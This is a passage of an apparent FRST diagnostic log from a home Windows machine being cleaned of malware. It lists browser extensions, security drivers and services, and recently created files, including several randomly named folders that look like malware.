    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
    FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)

    Chrome:
    =======
    CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-10]
    CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
    CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
    CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
    CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
    CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
    CHR Extension: (No Name) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
    CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
    CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
    CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
    CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
    CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
    CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
    R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
    S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
    R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
    R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [198512 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
    R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
    R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
    U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [28272 2019-02-09] (Adlice -> )
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
    S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One month (created) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-10 15:23 - 2019-02-10 15:23 - 000000000 ____D C:\Users\Thomazing!\Downloads\FRST-OlderVersion
    2019-02-10 15:20 - 2019-02-10 15:20 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
    2019-02-09 13:22 - 2019-02-09 12:51 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
    2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
    2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
    2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
    2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
    2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
    2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
    2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
    2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
    2019-02-09 12:55 - 2019-02-09 12:55 - 000000675 _____ C:\Users\Thomazing!\Desktop\malware trojan.txt
    2019-02-09 12:49 - 2019-02-09 12:49 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2019-02-09 12:46 - 2019-02-09 12:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\PeerDistRepub
    2019-02-09 12:44 - 2019-02-09 12:44 - 000002783 _____ C:\Users\Thomazing!\Desktop\AdwCleaner[S00].txt
    2019-02-09 12:29 - 2019-02-09 12:46 - 000000000 ____D C:\AdwCleaner
    2019-02-09 12:29 - 2019-02-09 12:29 - 007316688 _____ (Malwarebytes) C:\Users\Thomazing!\Downloads\AdwCleaner.exe
    2019-02-09 12:29 - 2019-02-09 12:29 - 007316688 _____ (Malwarebytes) C:\Users\Thomazing!\Desktop\AdwCleaner.exe
    2019-02-09 12:27 - 2019-02-09 12:27 - 000036161 _____ C:\Users\Thomazing!\Desktop\malwarebytes.txt
    2019-02-09 12:06 - 2019-02-09 12:06 - 000198512 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
    2019-02-09 12:06 - 2019-02-09 12:06 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\mbamtray
    2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\mbam
    2019-02-09 12:06 - 2019-02-09 12:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2019-02-09 12:06 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
    2019-02-09 12:06 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
    2019-02-09 12:05 - 2019-02-09 12:05 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172 (1).exe
    2019-02-09 12:05 - 2019-02-09 12:05 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Desktop\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172 (1).exe
    2019-02-09 10:14 - 2019-02-09 10:14 - 000056671 _____ C:\Users\Thomazing!\Downloads\6971471.pdf
    2019-02-09 09:07 - 2019-02-09 09:07 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\NetworkTiles
    2019-02-09 08:20 - 2019-02-09 12:05 - 000000000 ____D C:\ProgramData\Malwarebytes
    2019-02-09 08:20 - 2019-02-09 12:05 - 000000000 ____D C:\Program Files\Malwarebytes
    2019-02-09 08:16 - 2019-02-09 08:19 - 064476848 _____ (Malwarebytes ) C:\Users\Thomazing!\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9172.exe
    2019-02-09 08:15 - 2019-02-09 08:15 - 000019920 _____ C:\Users\Thomazing!\Desktop\Delete report.txt
    2019-02-09 08:14 - 2019-02-09 08:14 - 000002354 _____ C:\Users\Thomazing!\Desktop\Report2.txt
    2019-02-09 08:14 - 2019-02-09 08:14 - 000002354 _____ C:\Users\Thomazing!\Desktop\Report1.txt
    2019-02-09 07:31 - 2019-02-09 07:31 - 000000899 _____ C:\Users\Public\Desktop\RogueKiller.lnk
    2019-02-09 07:30 - 2019-02-09 12:23 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\m1dfk02frcw
    2019-02-09 07:20 - 2019-02-09 07:32 - 000028272 _____ C:\Windows\system32\Drivers\truesight.sys
    2019-02-09 07:19 - 2019-02-09 07:19 - 000000000 ____D C:\ProgramData\RogueKiller
    2019-02-09 07:18 - 2019-02-09 07:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
    2019-02-09 07:18 - 2019-02-09 07:31 - 000000000 ____D C:\Program Files\RogueKiller
    2019-02-09 07:17 - 2019-02-09 07:17 - 029333240 _____ (Adlice Software ) C:\Users\Thomazing!\Desktop\RogueKiller_setup_ref3.exe
    2019-02-09 07:16 - 2019-02-09 07:17 - 029333240 _____ (Adlice Software ) C:\Users\Thomazing!\Downloads\RogueKiller_setup_ref3.exe
    2019-02-09 06:59 - 2019-02-09 07:48 - 000000000 ____D C:\Program Files\9AH8B0L5IJ
    2019-02-09 06:59 - 2019-02-09 07:04 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dnrpypyqja1
    2019-02-09 01:03 - 2019-02-09 01:03 - 000023657 _____ C:\Users\Thomazing!\Downloads\Addition.txt
    2019-02-09 00:59 - 2019-02-10 15:25 - 000015224 _____ C:\Users\Thomazing!\Downloads\FRST.txt
    2019-02-09 00:59 - 2019-02-10 15:24 - 000000000 ____D C:\FRST
    2019-02-09 00:58 - 2019-02-10 15:23 - 002434048 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
    2019-02-09 00:43 - 2019-02-09 12:23 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
    2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
    2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
    2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
    2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
    2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
    2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
    2019-02-08 23:02 - 2019-02-09 09:36 - 000004210 _____ C:\Windows\System32\Tasks\CCleaner Update
    2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
    2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
    2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
    2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
    2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
    2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
    2019-02-08 22:55 - 2015-05-29 21:07 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
    2019-02-08 22:46 - 2019-02-08 22:46 - 000000836 __RSH C:\ProgramData\ntuser.pol
    2019-02-08 22:28 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4
    2019-02-08 22:22 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 22:22 - 2019-02-08 22:22 - 000000009 _____ C:\Users\Thomazing!\rstr3.ini
    2019-02-08 22:11 - 2019-02-09 07:48 - 000000004 _____ C:\ProgramData\lock.dat
    2019-02-08 22:11 - 2019-02-09 07:30 - 000000036 _____ C:\ProgramData\irw.atsd
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ C:\ProgramData\ts.dat
    2019-02-08 22:08 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm
    2019-02-08 22:03 - 2019-02-10 15:21 - 000004178 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{166847B2-00F9-4170-B86A-AB179FF4BAF1}
    2019-02-08 22:03 - 2019-02-08 22:03 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Macromedia
    2019-02-08 22:00 - 2019-02-08 22:00 - 000003584 _____ C:\Windows\SECOH-QAD.dll
    2019-02-08 21:58 - 2019-02-09 10:34 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\DMCache
    2019-02-08 21:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr
    2019-02-08 21:58 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Video
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Compressed
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
    2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ C:\Windows\bxetfbicyncsflqei.bxetf
    2019-02-08 21:49 - 2019-02-08 23:06 - 000000000 ____D C:\ProgramData\boost_interprocess
    2019-02-08 21:49 - 2019-02-08 21:52 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Opera Software
    2019-02-08 21:48 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\la5jchefohd
    2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\znnxx0e21dn
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ C:\Users\Thomazing!\AppData\Local\wbem.ini
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Mozilla
    2019-02-08 21:46 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\Cta
    2019-02-08 21:46 - 2019-02-08 21:48 - 008019296 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2019-02-08 21:46 - 2019-02-08 21:48 - 001123400 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 000621928 _____ (VxDriver) C:\Windows\B62CD2D3FFB1.sys
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Opera Software
    2019-02-08 21:45 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\uTorrent
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ C:\Users\Thomazing!\AppData\Local\installer.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000053888 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS
    2019-02-08 21:45 - 2019-02-08 21:45 - 000045720 _____ (Toshiba Corporation) C:\Windows\system32\Drivers\Thotkey.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000044208 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\tosrfec.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000035584 _____ (Western Digital Technologies, Inc.) C:\Windows\system32\Drivers\wdcsam64.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000017920 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\FwLnk.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000003088 _____ C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000881 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Synaptics
    2019-02-08 21:44 - 2019-02-08 21:45 - 000000000 ____D C:\ProgramData\VMR6PC5JA6GYC9V0XH3B
    2019-02-08 21:44 - 2019-02-08 21:44 - 001795952 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01011.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000722672 _____ (Synaptics Incorporated) C:\Windows\system32\SynCOM.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000528112 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
    2019-02-08 21:44 - 2019-02-08 21:44 - 000422128 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo19.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000400112 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCom.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000251632 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000169712 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCom.dll
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\WinRAR
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
    2019-02-08 21:41 - 2019-02-08 21:41 - 003141232 _____ (Alexander Roshal) C:\Users\Thomazing!\Downloads\winrar-x64-57b1.exe
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\WinRAR
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\VideoLAN
    2019-02-08 21:37 - 2019-02-08 21:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2019-02-08 21:35 - 2019-02-08 21:35 - 010627744 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd64.sys
    2019-02-08 21:35 - 2019-02-08 21:35 - 006593816 _____ (Intel Corporation) C:\Windows\system32\igdumd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004931384 _____ (Intel Corporation) C:\Windows\SysWOW64\igdumd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004755784 _____ (Intel Corporation) C:\Windows\system32\igd10umd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004370016 _____ (Intel Corporation) C:\Windows\SysWOW64\igd10umd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 001991936 _____ C:\Windows\system32\iglhxa64.cpa
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\SysWOW64\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\system32\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\SysWOW64\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\system32\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000208896 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhsip32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000206336 _____ (Intel Corporation) C:\Windows\system32\iglhsip64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000188416 _____ (Intel Corporation) C:\Windows\system32\iglhcp64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000147456 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhcp32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\SysWOW64\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\system32\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060254 _____ C:\Windows\system32\iglhxg64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060226 _____ C:\Windows\system32\iglhxc64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060015 _____ C:\Windows\system32\iglhxo64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000005424 _____ C:\Windows\system32\iglhxs64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000001090 _____ C:\Windows\system32\iglhxa64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000000000 ____D C:\Windows\PCHEALTH
    2019-02-08 21:34 - 2019-02-08 21:34 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
    2019-02-08 21:33 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:35 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 __RHD C:\MSOCache
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Microsoft Help
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
    2019-02-08 21:26 - 2019-02-08 23:17 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Google
